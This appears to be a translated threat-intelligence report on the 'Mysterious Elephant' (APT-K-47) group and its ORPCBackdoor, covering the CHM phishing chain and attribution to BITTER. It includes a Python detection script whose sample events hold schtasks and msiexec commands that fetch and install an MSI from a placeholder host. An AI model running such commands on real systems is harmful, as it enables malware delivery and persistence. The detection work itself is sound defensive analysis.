For the past couple of years, the Asia-Pacific region has been a hotbed of cyberattacks from various intruders.
Among the many APT members active in the region, some of them are focused on Pakistani victims.
Recently, Kaspersky Lab researchers discovered a cluster of activity in this region, centered on a similar victim profile, to which two private TTP analysis reports have been devoted over the past few years, naming the attacker Mysterious Elephant.
Moreover, some of the Mysterious Elephant tools bear similarities to older tools that were previously used by other attackers in the region.
For example, earlier versions of the Rover backdoor were seen on SideWinder and Confucius.
One of the reports also analyzed a campaign targeting a number of victims in Pakistan.
The main malware in this campaign is a new family of backdoors that are dropped onto victims’ computers via an RTF document and CVE-2017-11882 downloaded via another phishing document.
The backdoor module communicates with its C2 server using remote procedure call (RPC) and has the ability to execute files or commands on the victim’s machine, as well as receive files or commands from the C2 server to be executed on the infected computer.
In turn, the Chinese infosec company Knownsec (知道创宇) came to the conclusion that the Mysterious Elephant described in the Kaspersky Lab report is none other than Bitter APT.
Chinese researchers got on its trail earlier this year through the analysis of a new backdoor called ORPCBackdoor.
After confirming their assumptions, Knownsec believes that the backdoor discovered by Kaspersky Lab is the same malware as ORPCBackdoor.
In their report, the Chinese researchers expanded their analysis of the overall attack chain and, based on telemetry, also identified new victims outside of Pakistan, presenting details of the attacks and APT-related IOCs in their article.
Original Paper | Demystifying South Asia’s New APT Organization APT-K-47 “Mysterious Elephant”
Original | 404 Advanced Threat Intelligence, Seebug Vulnerability Platform | 2023-08-04 05:07 | Posted from Hubei
Author: K&NaN@知道创宇404 Advanced Threat Intelligence Team
Date: August 4, 2023
In March 2023, the Knownsec 404 Advanced Threat Intelligence Team was the first in the world to capture the weaponized backdoor of a new APT group, which we call “ORPCBackdoor”, and in May 2023 we released a detailed analysis of it: Bitter Organization New Attack Weapon Analysis Report - ORPCBackdoor Weapon Analysis
https://mp.weixin.qq.com/s/9cqXdFn7erJupk9QPRhqpg
In that report, we attributed this backdoor as the latest weapon used by BITTER (“Man Linghua”). However, we noticed that Kaspersky recently released a report claiming to have discovered a brand-new APT group in the second quarter; the group’s main target is Pakistan, and it is named “Mysterious Elephant”. In addition, two non-public reports were released: the first mainly described the group’s main tactics, techniques and procedures (TTPs) over the past few years, and the second described the group’s attacks on Pakistan’s foreign-affairs-related departments.
The main feature of this group is the use of a brand new backdoor, which is delivered to the victim’s machine through a malicious RTF document. Malicious RTF documents are delivered via phishing emails.
This brand-new backdoor communicates with the C2 server through RPC, and has the ability to execute files or commands on the controlled machine. At the same time, the backdoor can also receive files and commands from the C2 server and execute them.
After confirmation, the backdoor discovered by Kaspersky is the same backdoor program as the “ORPCBackdoor” we first captured. Considering the differences in attribution, the Knownsec 404 Advanced Threat Intelligence Team has assigned a new designation to the “new” group using “ORPCBackdoor”: APT-K-47, Chinese name “Mysterious Elephant”.
In this article, we further expand the analysis to the sample’s overall attack chain and its homology (shared-origin) relationships. Through Knownsec’s telemetry big data we have also observed that the group’s targets are not limited to Pakistan; there are traces of attacks on other countries as well.
At the same time, retrospective analysis shows that the group’s earliest attack activity should have started around March 2022. This article publishes the details of the APT group’s attacks and the related IOCs.
1. Overall attack chain
[Figure 1]
In one APT-K01 attack, the attacker sent a CHM file to the target via a phishing email. The CHM file used the “Russia-China Friendship, Peace and Development Committee” as a lure; the lure content is as follows.
[Figure 2]
From the content of the phishing file we can see that the group’s targets are not limited to Pakistan as described by Kaspersky; according to Knownsec’s telemetry big data, the group targets multiple countries.
The malicious part of the CHM file is doc.html, which contains an OBJECT element used to create a scheduled task that runs every 15 minutes. The task downloads and executes the second-stage malicious program from the second-stage server; the second-stage program is an MSI file.
[Figure 3]
The second-stage MSI file carries a “white and black” pair, i.e. a DLL sideloading pair: the “black” file is the ORPCBackdoor mentioned in Kaspersky’s report (OLMAPI32.dll), and the “white” file is an official Microsoft service executable that is used to start the black file.
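The chain above (CHM viewer spawning a scheduled-task creation, a short-interval task, and msiexec pulling an MSI from a remote URL) is well suited to process-creation telemetry. The following is an added detection example, not code from the Knownsec 404 article: it runs a few simple rules over constructed, Sysmon-style process-creation events. The field names (ParentImage, Image, CommandLine), the hostname and the 15-minute threshold are assumptions for illustration; the threshold mirrors the interval reported in the article.

```python
"""Detect the CHM -> scheduled task -> remote MSI pattern in process-creation events.

Added example for this write-up, not the article's own code. Events are constructed
Sysmon-style records; field names and sample values are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str   # assumed: Sysmon "ParentImage"
    image: str          # assumed: Sysmon "Image"
    command_line: str   # assumed: Sysmon "CommandLine"


# Constructed sample events (placeholder host "stage2.example.invalid").
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\hh.exe", r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /create /sc minute /mo 15 /tn "Updater" '
                 r'/tr "msiexec /i http://stage2.example.invalid/update.msi /qn"'),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /create /sc daily /tn "Backup" /tr "C:\Tools\backup.exe"'),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\msiexec.exe",
                 r"msiexec /i http://stage2.example.invalid/update.msi /qn"),
    ProcessEvent(r"C:\Windows\hh.exe", r"C:\Windows\System32\cmd.exe",
                 r"cmd /c echo hello"),
]

CHM_VIEWERS = {"hh.exe"}                      # Windows HTML Help viewer
INTERPRETERS = {"schtasks.exe", "cmd.exe", "powershell.exe",
                "msiexec.exe", "wscript.exe", "mshta.exe"}
SHORT_INTERVAL_MIN = 15                       # assumed threshold (article: every 15 minutes)
# msiexec install (/i) whose package argument is an http(s) URL ending in .msi
REMOTE_MSI = re.compile(r"msiexec(\.exe)?\s.*?/i\s+https?://\S+\.msi", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def schtasks_interval_minutes(cmd: str):
    """Return the /mo value when cmd is a 'schtasks /create /sc minute' line, else None."""
    if not re.search(r"/sc\s+minute\b", cmd, re.IGNORECASE):
        return None
    m = re.search(r"/mo\s+(\d+)", cmd, re.IGNORECASE)
    return int(m.group(1)) if m else None


def classify(ev: ProcessEvent) -> list:
    """Return the detection labels that fire for one event (empty list if none)."""
    hits = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    # Rule 1: the CHM viewer should not be launching interpreters or task schedulers.
    if parent in CHM_VIEWERS and child in INTERPRETERS:
        hits.append("chm_spawns_interpreter")
    # Rule 2/3: task creation with a short minute interval, or a task whose action
    # installs an MSI fetched over HTTP.
    if child == "schtasks.exe" and re.search(r"/create\b", ev.command_line, re.IGNORECASE):
        interval = schtasks_interval_minutes(ev.command_line)
        if interval is not None and interval <= SHORT_INTERVAL_MIN:
            hits.append("short_interval_task")
        if REMOTE_MSI.search(ev.command_line):
            hits.append("task_runs_remote_msi")
    # Rule 4: msiexec itself installing a package straight from a URL.
    if child == "msiexec.exe" and REMOTE_MSI.search(ev.command_line):
        hits.append("msiexec_remote_install")
    return hits


def scan(events) -> dict:
    """Map event index -> labels for every event that triggered at least one rule."""
    results = {}
    for i, ev in enumerate(events):
        labels = classify(ev)
        if labels:
            results[i] = labels
    return results


if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].command_line, "->", ", ".join(labels))
```

The first constructed event fires all three CHM-chain rules at once, which is the combination worth alerting on; the daily backup task fires none, so the rules stay quiet on ordinary administrative task creation. Real deployments would feed these rules from Sysmon Event ID 1 or Security Event ID 4688 and add Event ID 4698 (task created) as a second source.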
2. Homology analysis
The ORPCBackdoor attack chain overlaps with the TTPs used by India-aligned threat actors. In particular, its TTPs and code structure closely resemble those of the BITTER group. The comparative analysis is as follows:
The CHM file structure used by the BITTER organization in previous attack activities is as follows:
[Figure 5]
The CHM file structure of the initial stage of ORPCBackdoor captured this time is as follows:
